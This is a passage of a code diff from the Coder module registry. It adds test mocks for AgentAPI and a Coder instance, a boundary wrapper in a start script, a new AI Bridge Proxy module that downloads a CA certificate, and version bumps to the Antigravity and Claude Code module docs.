+    type: "input",
+    content: `Message ${i + 1}`,
+    time: "2025-01-01T00:00:00Z",
+  }));
+} else if (process.env.PRESET === "huge") {
+  messages = [
+    {
+      id: 1,
+      type: "output",
+      content: "x".repeat(70000),
+      time: "2025-01-01T00:00:00Z",
+    },
+  ];
+}
+
+const server = http.createServer((req, res) => {
+  if (req.url === "/messages") {
+    res.writeHead(200, { "Content-Type": "application/json" });
+    res.end(JSON.stringify({ messages }));
+  } else if (req.url === "/status") {
+    res.writeHead(200, { "Content-Type": "application/json" });
+    res.end(JSON.stringify({ status: "stable" }));
+  } else {
+    res.writeHead(404);
+    res.end();
+  }
+});
+
+server.listen(port, () => {
+  console.error(`Mock AgentAPI listening on port ${port}`);
+});
+
+process.on("SIGTERM", () => {
+  server.close(() => process.exit(0));
+});
+
+process.on("SIGINT", () => {
+  server.close(() => process.exit(0));
+});

registry/coder/modules/agentapi/testdata/agentapi-mock.js

@@ -6,12 +6,50 @@ const args = process.argv.slice(2);
 const portIdx = args.findIndex((arg) => arg === "--port") + 1;
 const port = portIdx ? args[portIdx] : 3284;
 
+if (args.includes("--version")) {
+  console.log("agentapi version 99.99.99");
+  process.exit(0);
+}
+
 console.log(`starting server on port ${port}`);
 fs.writeFileSync(
   "/home/coder/agentapi-mock.log",
   `AGENTAPI_ALLOWED_HOSTS: ${process.env.AGENTAPI_ALLOWED_HOSTS}`,
 );
 
+// Log state persistence env vars.
+for (const v of [
+  "AGENTAPI_STATE_FILE",
+  "AGENTAPI_PID_FILE",
+  "AGENTAPI_SAVE_STATE",
+  "AGENTAPI_LOAD_STATE",
+]) {
+  if (process.env[v]) {
+    fs.appendFileSync(
+      "/home/coder/agentapi-mock.log",
+      `\n${v}: ${process.env[v]}`,
+    );
+  }
+}
+// Log boundary env vars.
+for (const v of ["AGENTAPI_BOUNDARY_PREFIX"]) {
+  if (process.env[v]) {
+    fs.appendFileSync(
+      "/home/coder/agentapi-mock.log",
+      `\n${v}: ${process.env[v]}`,
+    );
+  }
+}
+
+// Write PID file for shutdown script.
+if (process.env.AGENTAPI_PID_FILE) {
+  const path = require("path");
+  fs.mkdirSync(path.dirname(process.env.AGENTAPI_PID_FILE), {
+    recursive: true,
+  });
+  fs.writeFileSync(process.env.AGENTAPI_PID_FILE, String(process.pid));
+}
+
 http
   .createServer(function (_request, response) {
     response.writeHead(200);

registry/coder/modules/agentapi/testdata/agentapi-start.sh

@@ -17,6 +17,16 @@ if [ -n "$AGENTAPI_CHAT_BASE_PATH" ]; then
   export AGENTAPI_CHAT_BASE_PATH
 fi
 
-agentapi server --port "$port" --term-width 67 --term-height 1190 -- \
-  bash -c aiagent \
-  > "$log_file_path" 2>&1
+# Use boundary wrapper if configured by agentapi module.
+# AGENTAPI_BOUNDARY_PREFIX is set by the agentapi module's main.sh
+# and points to a wrapper script that runs the command through coder boundary.
+if [ -n "${AGENTAPI_BOUNDARY_PREFIX:-}" ]; then
+  echo "Starting with boundary: ${AGENTAPI_BOUNDARY_PREFIX}" >> /home/coder/test-agentapi-start.log
+  agentapi server --port "$port" --term-width 67 --term-height 1190 -- \
+    "${AGENTAPI_BOUNDARY_PREFIX}" bash -c aiagent \
+    > "$log_file_path" 2>&1
+else
+  agentapi server --port "$port" --term-width 67 --term-height 1190 -- \
+    bash -c aiagent \
+    > "$log_file_path" 2>&1
+fi

registry/coder/modules/agentapi/testdata/coder-instance-mock.js

@@ -0,0 +1,61 @@
+#!/usr/bin/env node
+// Mock Coder instance server for shutdown script tests.
+// Captures POST requests to /log-snapshot endpoint.
+
+const http = require("http");
+const fs = require("fs");
+const port = process.argv[2] || 8080;
+const outputFile = process.env.OUTPUT_FILE || "/tmp/snapshot-posted.json";
+const httpCode = parseInt(process.env.HTTP_CODE || "204", 10);
+
+const server = http.createServer((req, res) => {
+  const url = new URL(req.url, `http://localhost:${port}`);
+
+  // Expected path: /api/v2/workspaceagents/me/tasks/{task_id}/log-snapshot
+  const pathMatch = url.pathname.match(/\/tasks\/([^\/]+)\/log-snapshot$/);
+
+  if (req.method === "POST" && pathMatch) {
+    const taskId = pathMatch[1];
+    let body = "";
+    req.on("data", (chunk) => {
+      body += chunk.toString();
+    });
+
+    req.on("end", () => {
+      // Save captured snapshot with task ID for verification
+      const snapshotData = {
+        task_id: taskId,
+        payload: JSON.parse(body),
+      };
+      fs.writeFileSync(outputFile, JSON.stringify(snapshotData, null, 2));
+      console.error(
+        `Captured snapshot for task ${taskId} (${body.length} bytes) to ${outputFile}`,
+      );
+
+      // Return configured status code
+      res.writeHead(httpCode);
+      res.end();
+    });
+
+    req.on("error", (err) => {
+      console.error("Request error:", err);
+      res.writeHead(500);
+      res.end();
+    });
+  } else {
+    res.writeHead(404);
+    res.end();
+  }
+});
+
+server.listen(port, () => {
+  console.error(`Mock Coder instance listening on port ${port}`);
+});
+
+process.on("SIGTERM", () => {
+  server.close(() => process.exit(0));
+});
+
+process.on("SIGINT", () => {
+  server.close(() => process.exit(0));
+});

registry/coder/modules/aibridge-proxy/README.md

@@ -0,0 +1,89 @@
+---
+display_name: AI Bridge Proxy
+description: Configure a workspace to route AI tool traffic through AI Bridge via AI Bridge Proxy.
+icon: ../../../../.icons/coder.svg
+verified: true
+tags: [helper, aibridge]
+---
+
+# AI Bridge Proxy
+
+This module configures a Coder workspace to use [AI Bridge Proxy](https://coder.com/docs/ai-coder/ai-bridge/ai-bridge-proxy).
+It downloads the proxy's CA certificate from the Coder deployment and provides Terraform outputs (`proxy_auth_url` and `cert_path`) that tool-specific modules can use to route their traffic through the proxy.
+
+```tf
+module "aibridge-proxy" {
+  source    = "registry.coder.com/coder/aibridge-proxy/coder"
+  version   = "1.0.0"
+  agent_id  = coder_agent.main.id
+  proxy_url = "https://aiproxy.example.com"
+}
+```
+
+> [!NOTE]
+> AI Bridge Proxy is a Premium Coder feature that requires [AI Governance Add-On](https://coder.com/docs/ai-coder/ai-governance).
+> See the [AI Bridge Proxy setup guide](https://coder.com/docs/ai-coder/ai-bridge/ai-bridge-proxy/setup) for details on configuring the proxy on your Coder deployment.
+
+## How it works
+
+[AI Bridge Proxy](https://coder.com/docs/ai-coder/ai-bridge/ai-bridge-proxy) is an HTTP proxy that intercepts traffic to AI providers and forwards it through [AI Bridge](https://coder.com/docs/ai-coder/ai-bridge), enabling centralized LLM management, governance, and cost tracking.
+Any process with the proxy environment variables set will route **all** its traffic through the proxy.
+
+This module **does not** set proxy environment variables globally on the workspace.
+Instead, it provides Terraform outputs (`proxy_auth_url` and `cert_path`) that tool-specific modules consume to configure proxy routing.
+See the [Copilot module](https://registry.coder.com/modules/coder-labs/copilot) for a working integration example.
+
+It is recommended that tool modules scope the proxy environment variables to their own process rather than setting them globally on the workspace, to avoid routing unnecessary traffic through the proxy.
+
+> [!WARNING]
+> If the setup script fails (e.g. the proxy is unreachable), the workspace will still start but the agent will report a startup script error.
+> Tools that depend on the proxy will not work until the issue is resolved. Check the workspace build logs for details.
+
+## Startup Coordination
+
+When used with tool-specific modules (e.g. [Copilot](https://registry.coder.com/modules/coder-labs/copilot)),
+the setup script signals completion via [`coder exp sync`](https://coder.com/docs/admin/templates/startup-coordination) so dependent modules can wait for the `aibridge-proxy` module to complete before starting.
+
+Dependent modules are unblocked once the setup script finishes, regardless of success or failure.
+If the setup fails, dependent modules are expected to detect the failure and handle the error accordingly.
+
+To enable startup coordination, set `CODER_AGENT_SOCKET_SERVER_ENABLED=true` in the workspace container environment:
+
+```hcl
+env = [
+  "CODER_AGENT_TOKEN=${coder_agent.main.token}",
+  "CODER_AGENT_SOCKET_SERVER_ENABLED=true",
+]
+```
+
+> [!NOTE]
+> [Startup coordination](https://coder.com/docs/admin/templates/startup-coordination) requires Coder >= v2.30.
+> Without it, the sync calls are skipped gracefully but dependent modules may fail to start if the `aibridge-proxy` setup has not completed in time.
+
+## Examples
+
+### Custom certificate path
+
+```tf
+module "aibridge-proxy" {
+  source    = "registry.coder.com/coder/aibridge-proxy/coder"
+  version   = "1.0.0"
+  agent_id  = coder_agent.main.id
+  proxy_url = "https://aiproxy.example.com"
+  cert_path = "/home/coder/.certs/aibridge-proxy-ca.pem"
+}
+```
+
+### Proxy with custom port
+
+For deployments where the proxy is accessed directly on a configured port.
+See [security considerations](https://coder.com/docs/ai-coder/ai-bridge/ai-bridge-proxy/setup#security-considerations) for network access guidelines.
+
+```tf
+module "aibridge-proxy" {
+  source    = "registry.coder.com/coder/aibridge-proxy/coder"
+  version   = "1.0.0"
+  agent_id  = coder_agent.main.id
+  proxy_url = "http://internal-proxy:8888"
+}
+```

registry/coder/modules/aibridge-proxy/main.test.ts

@@ -0,0 +1,254 @@
+import { serve } from "bun";
+import {
+  afterEach,
+  beforeAll,
+  describe,
+  expect,
+  it,
+  setDefaultTimeout,
+} from "bun:test";
+import {
+  execContainer,
+  findResourceInstance,
+  removeContainer,
+  runContainer,
+  runTerraformApply,
+  runTerraformInit,
+  testRequiredVariables,
+} from "~test";
+
+let cleanupFunctions: (() => Promise<void>)[] = [];
+const registerCleanup = (cleanup: () => Promise<void>) => {
+  cleanupFunctions.push(cleanup);
+};
+afterEach(async () => {
+  const cleanupFnsCopy = cleanupFunctions.slice().reverse();
+  cleanupFunctions = [];
+  for (const cleanup of cleanupFnsCopy) {
+    try {
+      await cleanup();
+    } catch (error) {
+      console.error("Error during cleanup:", error);
+    }
+  }
+});
+
+const FAKE_CERT =
+  "-----BEGIN CERTIFICATE-----\nMIIBfakecert\n-----END CERTIFICATE-----\n";
+
+// Runs terraform apply to render the setup script, then starts a Docker
+// container where we can execute it against a mock server.
+const setupContainer = async (vars: Record<string, string> = {}) => {
+  const state = await runTerraformApply(import.meta.dir, {
+    agent_id: "foo",
+    proxy_url: "https://aiproxy.example.com",
+    ...vars,
+  });
+  const instance = findResourceInstance(state, "coder_script");
+  const id = await runContainer("lorello/alpine-bash");
+
+  registerCleanup(async () => {
+    await removeContainer(id);
+  });
+
+  return { id, instance };
+};
+
+// Starts a mock HTTP server that simulates the Coder API certificate endpoint.
+// Returns the server and its base URL.
+const setupServer = (handler: (req: Request) => Response) => {
+  const server = serve({
+    fetch: handler,
+    port: 0,
+  });
+  registerCleanup(async () => {
+    server.stop();
+  });
+  return {
+    server,
+    // Base URL without trailing slash
+    url: server.url.toString().slice(0, -1),
+  };
+};
+
+setDefaultTimeout(30 * 1000);
+
+describe("aibridge-proxy", () => {
+  beforeAll(async () => {
+    await runTerraformInit(import.meta.dir);
+  });
+
+  // Verify that agent_id and proxy_url are required.
+  testRequiredVariables(import.meta.dir, {
+    agent_id: "foo",
+    proxy_url: "https://aiproxy.example.com",
+  });
+
+  it("downloads the CA certificate successfully", async () => {
+    let receivedToken = "";
+    const { url } = setupServer((req) => {
+      const reqUrl = new URL(req.url);
+      if (reqUrl.pathname === "/api/v2/aibridge/proxy/ca-cert.pem") {
+        receivedToken = req.headers.get("Coder-Session-Token") || "";
+        return new Response(FAKE_CERT, {
+          status: 200,
+          headers: { "Content-Type": "application/x-pem-file" },
+        });
+      }
+      return new Response("not found", { status: 404 });
+    });
+
+    const { id, instance } = await setupContainer();
+
+    // Override ACCESS_URL and SESSION_TOKEN at runtime to point at the mock server.
+    const exec = await execContainer(id, [
+      "env",
+      `ACCESS_URL=${url}`,
+      "SESSION_TOKEN=test-session-token-123",
+      "bash",
+      "-c",
+      instance.script,
+    ]);
+    expect(exec.exitCode).toBe(0);
+    expect(exec.stdout).toContain(
+      "AI Bridge Proxy CA certificate saved to /tmp/aibridge-proxy/ca-cert.pem",
+    );
+
+    // Verify the cert was written to the default path.
+    const certContent = await execContainer(id, [
+      "cat",
+      "/tmp/aibridge-proxy/ca-cert.pem",
+    ]);
+    expect(certContent.stdout).toContain("BEGIN CERTIFICATE");
+
+    // Verify the session token was sent in the request header.
+    expect(receivedToken).toBe("test-session-token-123");
+  });
+
+  it("fails when the server is unreachable", async () => {
+    const { id, instance } = await setupContainer();
+
+    // Port 9999 has nothing listening, so curl will fail to connect.
+    const exec = await execContainer(id, [
+      "env",
+      "ACCESS_URL=http://localhost:9999",
+      "SESSION_TOKEN=mock-token",
+      "bash",
+      "-c",
+      instance.script,
+    ]);
+    expect(exec.exitCode).not.toBe(0);
+    expect(exec.stdout).toContain(
+      "AI Bridge Proxy setup failed: could not connect to",
+    );
+  });
+
+  it("fails when the server returns a non-200 status", async () => {
+    const { url } = setupServer(() => {
+      return new Response("not found", { status: 404 });
+    });
+
+    const { id, instance } = await setupContainer();
+
+    const exec = await execContainer(id, [
+      "env",
+      `ACCESS_URL=${url}`,
+      "SESSION_TOKEN=mock-token",
+      "bash",
+      "-c",
+      instance.script,
+    ]);
+    expect(exec.exitCode).not.toBe(0);
+    expect(exec.stdout).toContain(
+      "AI Bridge Proxy setup failed: unexpected response",
+    );
+  });
+
+  it("fails when the server returns an empty response", async () => {
+    const { url } = setupServer((req) => {
+      const reqUrl = new URL(req.url);
+      if (reqUrl.pathname === "/api/v2/aibridge/proxy/ca-cert.pem") {
+        return new Response("", { status: 200 });
+      }
+      return new Response("not found", { status: 404 });
+    });
+
+    const { id, instance } = await setupContainer();
+
+    const exec = await execContainer(id, [
+      "env",
+      `ACCESS_URL=${url}`,
+      "SESSION_TOKEN=mock-token",
+      "bash",
+      "-c",
+      instance.script,
+    ]);
+    expect(exec.exitCode).not.toBe(0);
+    expect(exec.stdout).toContain(
+      "AI Bridge Proxy setup failed: downloaded certificate is empty.",
+    );
+  });
+
+  it("saves the certificate to a custom path", async () => {
+    const { url } = setupServer((req) => {
+      const reqUrl = new URL(req.url);
+      if (reqUrl.pathname === "/api/v2/aibridge/proxy/ca-cert.pem") {
+        return new Response(FAKE_CERT, {
+          status: 200,
+          headers: { "Content-Type": "application/x-pem-file" },
+        });
+      }
+      return new Response("not found", { status: 404 });
+    });
+
+    // Pass a custom cert_path to terraform apply so the script uses it.
+    const { id, instance } = await setupContainer({
+      cert_path: "/tmp/custom/certs/proxy-ca.pem",
+    });
+
+    const exec = await execContainer(id, [
+      "env",
+      `ACCESS_URL=${url}`,
+      "SESSION_TOKEN=mock-token",
+      "bash",
+      "-c",
+      instance.script,
+    ]);
+    expect(exec.exitCode).toBe(0);
+    expect(exec.stdout).toContain(
+      "AI Bridge Proxy CA certificate saved to /tmp/custom/certs/proxy-ca.pem",
+    );
+
+    const certContent = await execContainer(id, [
+      "cat",
+      "/tmp/custom/certs/proxy-ca.pem",
+    ]);
+    expect(certContent.stdout).toContain("BEGIN CERTIFICATE");
+  });
+
+  it("does not create global proxy env vars via coder_env", async () => {
+    const state = await runTerraformApply(import.meta.dir, {
+      agent_id: "foo",
+      proxy_url: "https://aiproxy.example.com",
+    });
+
+    // Proxy env vars should NOT be set globally via coder_env.
+    // They are intended to be scoped to specific tool processes.
+    const proxyEnvVarNames = [
+      "HTTP_PROXY",
+      "HTTPS_PROXY",
+      "NODE_EXTRA_CA_CERTS",
+      "SSL_CERT_FILE",
+      "REQUESTS_CA_BUNDLE",
+      "CURL_CA_BUNDLE",
+    ];
+    const proxyEnvVars = state.resources.filter(
+      (r) =>
+        r.type === "coder_env" &&
+        r.instances.some((i) =>
+          proxyEnvVarNames.includes(i.attributes.name as string),
+        ),
+    );
+    expect(proxyEnvVars.length).toBe(0);
+  });
+});

registry/coder/modules/aibridge-proxy/main.tf

@@ -0,0 +1,81 @@
+terraform {
+  required_version = ">= 1.9"
+
+  required_providers {
+    coder = {
+      source  = "coder/coder"
+      version = ">= 2.12"
+    }
+  }
+}
+
+variable "agent_id" {
+  type        = string
+  description = "The ID of a Coder agent."
+}
+
+variable "proxy_url" {
+  type        = string
+  description = "The full URL of the AI Bridge Proxy. Include the port if not using standard ports (e.g. https://aiproxy.example.com or http://internal-proxy:8888)."
+
+  validation {
+    condition     = can(regex("^https?://", var.proxy_url))
+    error_message = "proxy_url must start with http:// or https://."
+  }
+}
+
+variable "cert_path" {
+  type        = string
+  description = "Absolute path where the AI Bridge Proxy CA certificate will be saved."
+  default     = "/tmp/aibridge-proxy/ca-cert.pem"
+
+  validation {
+    condition     = startswith(var.cert_path, "/")
+    error_message = "cert_path must be an absolute path."
+  }
+}
+
+data "coder_workspace" "me" {}
+
+data "coder_workspace_owner" "me" {}
+
+locals {
+  # Build the proxy URL with Coder authentication embedded.
+  # AI Bridge Proxy expects the Coder session token as the password
+  # in basic auth: http://coder:<token>@host:port
+  proxy_auth_url = replace(
+    var.proxy_url,
+    "://",
+    "://coder:${data.coder_workspace_owner.me.session_token}@"
+  )
+}
+
+# These outputs are intended to be consumed by tool-specific modules,
+# to set proxy environment variables scoped to their process, rather than globally.
+output "proxy_auth_url" {
+  description = "The AI Bridge Proxy URL with Coder authentication embedded (http://coder:<token>@host:port)."
+  value       = local.proxy_auth_url
+  sensitive   = true
+}
+
+output "cert_path" {
+  description = "Path to the downloaded AI Bridge Proxy CA certificate."
+  value       = var.cert_path
+}
+
+# Downloads the CA certificate from the Coder deployment.
+# This runs on workspace start but does not block login, if the script
+# fails, the workspace remains usable and the error is visible in the build logs.
+# Tools that depend on the proxy will fail until the certificate is available.
+resource "coder_script" "aibridge_proxy_setup" {
+  agent_id           = var.agent_id
+  display_name       = "AI Bridge Proxy Setup"
+  icon               = "/icon/coder.svg"
+  run_on_start       = true
+  start_blocks_login = false
+  script = templatefile("${path.module}/scripts/setup.sh", {
+    CERT_PATH     = var.cert_path,
+    ACCESS_URL    = data.coder_workspace.me.access_url,
+    SESSION_TOKEN = data.coder_workspace_owner.me.session_token,
+  })
+}

registry/coder/modules/aibridge-proxy/main.tftest.hcl

@@ -0,0 +1,210 @@
+run "test_aibridge_proxy_basic" {
+  command = plan
+
+  variables {
+    agent_id  = "test-agent-id"
+    proxy_url = "https://aiproxy.example.com"
+  }
+
+  assert {
+    condition     = var.agent_id == "test-agent-id"
+    error_message = "Agent ID should match the input variable"
+  }
+
+  assert {
+    condition     = var.proxy_url == "https://aiproxy.example.com"
+    error_message = "Proxy URL should match the input variable"
+  }
+
+  assert {
+    condition     = var.cert_path == "/tmp/aibridge-proxy/ca-cert.pem"
+    error_message = "cert_path should default to /tmp/aibridge-proxy/ca-cert.pem"
+  }
+}
+
+run "test_aibridge_proxy_empty_url_validation" {
+  command = plan
+
+  variables {
+    agent_id  = "test-agent-id"
+    proxy_url = ""
+  }
+
+  expect_failures = [
+    var.proxy_url,
+  ]
+}
+
+run "test_aibridge_proxy_invalid_url_validation" {
+  command = plan
+
+  variables {
+    agent_id  = "test-agent-id"
+    proxy_url = "aiproxy.example.com"
+  }
+
+  expect_failures = [
+    var.proxy_url,
+  ]
+}
+
+run "test_aibridge_proxy_url_formats" {
+  command = plan
+
+  variables {
+    agent_id  = "test-agent-id"
+    proxy_url = "https://aiproxy.example.com"
+  }
+
+  assert {
+    condition     = can(regex("^https?://", var.proxy_url))
+    error_message = "Proxy URL should be a valid URL with scheme"
+  }
+}
+
+run "test_aibridge_proxy_https_with_port" {
+  command = plan
+
+  variables {
+    agent_id  = "test-agent-id"
+    proxy_url = "https://aiproxy.example.com:8443"
+  }
+
+  assert {
+    condition     = can(regex("^https?://", var.proxy_url))
+    error_message = "Proxy URL should support HTTPS with custom port"
+  }
+}
+
+run "test_aibridge_proxy_http_with_port" {
+  command = plan
+
+  variables {
+    agent_id  = "test-agent-id"
+    proxy_url = "http://internal-proxy:8888"
+  }
+
+  assert {
+    condition     = can(regex("^https?://", var.proxy_url))
+    error_message = "Proxy URL should support HTTP with custom port"
+  }
+}
+
+run "test_aibridge_proxy_empty_cert_path_validation" {
+  command = plan
+
+  variables {
+    agent_id  = "test-agent-id"
+    proxy_url = "https://aiproxy.example.com"
+    cert_path = ""
+  }
+
+  expect_failures = [
+    var.cert_path,
+  ]
+}
+
+run "test_aibridge_proxy_relative_cert_path_validation" {
+  command = plan
+
+  variables {
+    agent_id  = "test-agent-id"
+    proxy_url = "https://aiproxy.example.com"
+    cert_path = "relative/path/ca-cert.pem"
+  }
+
+  expect_failures = [
+    var.cert_path,
+  ]
+}
+
+run "test_aibridge_proxy_custom_cert_path" {
+  command = plan
+
+  variables {
+    agent_id  = "test-agent-id"
+    proxy_url = "https://aiproxy.example.com"
+    cert_path = "/home/coder/.certs/ca-cert.pem"
+  }
+
+  assert {
+    condition     = var.cert_path == "/home/coder/.certs/ca-cert.pem"
+    error_message = "cert_path should match the input variable"
+  }
+}
+
+run "test_aibridge_proxy_script" {
+  command = plan
+
+  variables {
+    agent_id  = "test-agent-id"
+    proxy_url = "https://aiproxy.example.com"
+  }
+
+  assert {
+    condition     = coder_script.aibridge_proxy_setup.run_on_start == true
+    error_message = "Script should run on start"
+  }
+
+  assert {
+    condition     = coder_script.aibridge_proxy_setup.start_blocks_login == false
+    error_message = "Script should not block login"
+  }
+
+  assert {
+    condition     = coder_script.aibridge_proxy_setup.display_name == "AI Bridge Proxy Setup"
+    error_message = "Script display name should be 'AI Bridge Proxy Setup'"
+  }
+}
+
+run "test_aibridge_proxy_auth_url_https" {
+  command = plan
+
+  variables {
+    agent_id  = "test-agent-id"
+    proxy_url = "https://aiproxy.example.com"
+  }
+
+  override_data {
+    target = data.coder_workspace_owner.me
+    values = {
+      session_token = "mock-session-token"
+    }
+  }
+
+  assert {
+    condition     = output.proxy_auth_url == "https://coder:mock-session-token@aiproxy.example.com"
+    error_message = "proxy_auth_url should contain the mocked session token"
+  }
+
+  assert {
+    condition     = output.cert_path == "/tmp/aibridge-proxy/ca-cert.pem"
+    error_message = "cert_path output should match the default"
+  }
+}
+
+run "test_aibridge_proxy_auth_url_http_with_port" {
+  command = plan
+
+  variables {
+    agent_id  = "test-agent-id"
+    proxy_url = "http://internal-proxy:8888"
+  }
+
+  override_data {
+    target = data.coder_workspace_owner.me
+    values = {
+      session_token = "mock-session-token"
+    }
+  }
+
+  assert {
+    condition     = output.proxy_auth_url == "http://coder:mock-session-token@internal-proxy:8888"
+    error_message = "proxy_auth_url should preserve the port"
+  }
+
+  assert {
+    condition     = output.cert_path == "/tmp/aibridge-proxy/ca-cert.pem"
+    error_message = "cert_path output should match the default"
+  }
+}

registry/coder/modules/aibridge-proxy/scripts/setup.sh

@@ -0,0 +1,79 @@
+#!/usr/bin/env bash
+
+if [ -z "$CERT_PATH" ]; then
+  CERT_PATH="${CERT_PATH}"
+fi
+
+if [ -z "$ACCESS_URL" ]; then
+  ACCESS_URL="${ACCESS_URL}"
+fi
+
+if [ -z "$SESSION_TOKEN" ]; then
+  SESSION_TOKEN="${SESSION_TOKEN}"
+fi
+
+set -euo pipefail
+
+# Signal startup coordination.
+# The trap ensures 'complete' is always called (even on failure) so dependent
+# scripts unblock promptly and can check for the certificate themselves.
+if command -v coder > /dev/null 2>&1; then
+  coder exp sync start "aibridge-proxy-setup" > /dev/null 2>&1 || true
+  trap 'coder exp sync complete "aibridge-proxy-setup" > /dev/null 2>&1 || true' EXIT
+fi
+
+if [ -z "$ACCESS_URL" ]; then
+  echo "Error: Coder access URL is not set."
+  exit 1
+fi
+
+if [ -z "$SESSION_TOKEN" ]; then
+  echo "Error: Coder session token is not set."
+  exit 1
+fi
+
+if ! command -v curl > /dev/null; then
+  echo "Error: curl is not installed."
+  exit 1
+fi
+
+echo "--------------------------------"
+echo "AI Bridge Proxy Setup"
+printf "Certificate path: %s\n" "$CERT_PATH"
+printf "Access URL: %s\n" "$ACCESS_URL"
+echo "--------------------------------"
+
+CERT_DIR=$(dirname "$CERT_PATH")
+mkdir -p "$CERT_DIR"
+
+CERT_URL="$ACCESS_URL/api/v2/aibridge/proxy/ca-cert.pem"
+echo "Downloading AI Bridge Proxy CA certificate from $CERT_URL..."
+
+# Download the certificate with a 5s connection timeout and 10s total timeout
+# to avoid the script hanging indefinitely.
+if ! HTTP_STATUS=$(curl -s -o "$CERT_PATH" -w "%%{http_code}" \
+  --connect-timeout 5 \
+  --max-time 10 \
+  -H "Coder-Session-Token: $SESSION_TOKEN" \
+  "$CERT_URL"); then
+  echo "❌ AI Bridge Proxy setup failed: could not connect to $CERT_URL."
+  echo "Ensure AI Bridge Proxy is enabled and reachable from the workspace."
+  rm -f "$CERT_PATH"
+  exit 1
+fi
+
+if [ "$HTTP_STATUS" -ne 200 ]; then
+  echo "❌ AI Bridge Proxy setup failed: unexpected response (HTTP $HTTP_STATUS)."
+  echo "Ensure AI Bridge Proxy is enabled and reachable from the workspace."
+  rm -f "$CERT_PATH"
+  exit 1
+fi
+
+if [ ! -s "$CERT_PATH" ]; then
+  echo "❌ AI Bridge Proxy setup failed: downloaded certificate is empty."
+  rm -f "$CERT_PATH"
+  exit 1
+fi
+
+echo "AI Bridge Proxy CA certificate saved to $CERT_PATH"
+echo "✅ AI Bridge Proxy setup complete."

registry/coder/modules/antigravity/README.md

@@ -16,7 +16,7 @@ Uses the [Coder Remote VS Code Extension](https://github.com/coder/vscode-coder)
 module "antigravity" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/antigravity/coder"
-  version  = "1.0.0"
+  version  = "1.0.1"
   agent_id = coder_agent.example.id
 }
 ```
@@ -29,7 +29,7 @@ module "antigravity" {
 module "antigravity" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/antigravity/coder"
-  version  = "1.0.0"
+  version  = "1.0.1"
   agent_id = coder_agent.example.id
   folder   = "/home/coder/project"
 }
@@ -45,7 +45,7 @@ The following example configures Antigravity to use the GitHub MCP server with a
 module "antigravity" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/antigravity/coder"
-  version  = "1.0.0"
+  version  = "1.0.1"
   agent_id = coder_agent.example.id
   folder   = "/home/coder/project"
   mcp = jsonencode({

registry/coder/modules/antigravity/main.tf

@@ -66,15 +66,15 @@ locals {
 
 module "vscode-desktop-core" {
   source  = "registry.coder.com/coder/vscode-desktop-core/coder"
-  version = "1.0.1"
+  version = "1.0.2"
 
   agent_id = var.agent_id
 
-  web_app_icon         = "/icon/antigravity.svg"
-  web_app_slug         = var.slug
-  web_app_display_name = var.display_name
-  web_app_order        = var.order
-  web_app_group        = var.group
+  coder_app_icon         = "/icon/antigravity.svg"
+  coder_app_slug         = var.slug
+  coder_app_display_name = var.display_name
+  coder_app_order        = var.order
+  coder_app_group        = var.group
 
   folder      = var.folder
   open_recent = var.open_recent

registry/coder/modules/claude-code/README.md

@@ -13,7 +13,7 @@ Run the [Claude Code](https://docs.anthropic.com/en/docs/agents-and-tools/claude
 ```tf
 module "claude-code" {
   source         = "registry.coder.com/coder/claude-code/coder"
-  version        = "4.5.0"
+  version        = "4.8.1"
   agent_id       = coder_agent.main.id
   workdir        = "/home/coder/project"
   claude_api_key = "xxxx-xxxxx-xxxx"
@@ -36,26 +36,43 @@ module "claude-code" {
 
 By default, Claude Code automatically resumes existing conversations when your workspace restarts. Sessions are tracked per workspace directory, so conversations continue where you left off. If no session exists (first start), your `ai_prompt` will run normally. To disable this behavior and always start fresh, set `continue = false`
 
+## State Persistence
+
+AgentAPI can save and restore its conversation state to disk across workspace restarts. This complements `continue` (which resumes the Claude CLI session) by also preserving the AgentAPI-level context. Enabled by default, requires agentapi >= v0.12.0 (older versions skip it with a warning).
+
+To disable:
+
+```tf
+module "claude-code" {
+  # ... other config
+  enable_state_persistence = false
+}
+```
+
 ## Examples
 
 ### Usage with Agent Boundaries
 
 This example shows how to configure the Claude Code module to run the agent behind a process-level boundary that restricts its network access.
 
+By default, when `enable_boundary = true`, the module uses `coder boundary` subcommand (provided by Coder) without requiring any installation.
+
 ```tf
 module "claude-code" {
-  source           = "registry.coder.com/coder/claude-code/coder"
-  version          = "4.5.0"
-  agent_id         = coder_agent.main.id
-  workdir          = "/home/coder/project"
-  enable_boundary  = true
-  boundary_version = "v0.5.1"
+  source          = "registry.coder.com/coder/claude-code/coder"
+  version         = "4.8.1"
+  agent_id        = coder_agent.main.id
+  workdir         = "/home/coder/project"
+  enable_boundary = true
 }
 ```
 
+> [!NOTE]
+> For developers: The module also supports installing boundary from a release version (`use_boundary_directly = true`) or compiling from source (`compile_boundary_from_source = true`). These are escape hatches for development and testing purposes.
+
 ### Usage with AI Bridge
 
-[AI Bridge](https://coder.com/docs/ai-coder/ai-bridge) is a Premium Coder feature that provides centralized LLM proxy management. To use AI Bridge, set `enable_aibridge = true`.
+[AI Bridge](https://coder.com/docs/ai-coder/ai-bridge) is a Premium Coder feature that provides centralized LLM proxy management. To use AI Bridge, set `enable_aibridge = true`. Requires Coder version >= 2.29.0.
 
 For tasks integration with AI Bridge, add `enable_aibridge = true` to the [Usage with Tasks](#usage-with-tasks) example below.
 
@@ -64,7 +81,7 @@ For tasks integration with AI Bridge, add `enable_aibridge = true` to the [Usage
 ```tf
 module "claude-code" {
   source          = "registry.coder.com/coder/claude-code/coder"
-  version         = "4.5.0"
+  version         = "4.8.1"
   agent_id        = coder_agent.main.id
   workdir         = "/home/coder/project"
   enable_aibridge = true
@@ -92,12 +109,11 @@ resource "coder_ai_task" "task" {
 data "coder_task" "me" {}
 
 module "claude-code" {
-  source         = "registry.coder.com/coder/claude-code/coder"
-  version        = "4.5.0"
-  agent_id       = coder_agent.main.id
-  workdir        = "/home/coder/project"
-  claude_api_key = "xxxx-xxxxx-xxxx"
-  ai_prompt      = data.coder_task.me.prompt
+  source    = "registry.coder.com/coder/claude-code/coder"
+  version   = "4.8.1"
+  agent_id  = coder_agent.main.id
+  workdir   = "/home/coder/project"
+  ai_prompt = data.coder_task.me.prompt
 
   # Optional: route through AI Bridge (Premium feature)
   # enable_aibridge = true
@@ -109,12 +125,15 @@ module "claude-code" {
 This example shows additional configuration options for version pinning, custom models, and MCP servers.
 
 > [!NOTE]
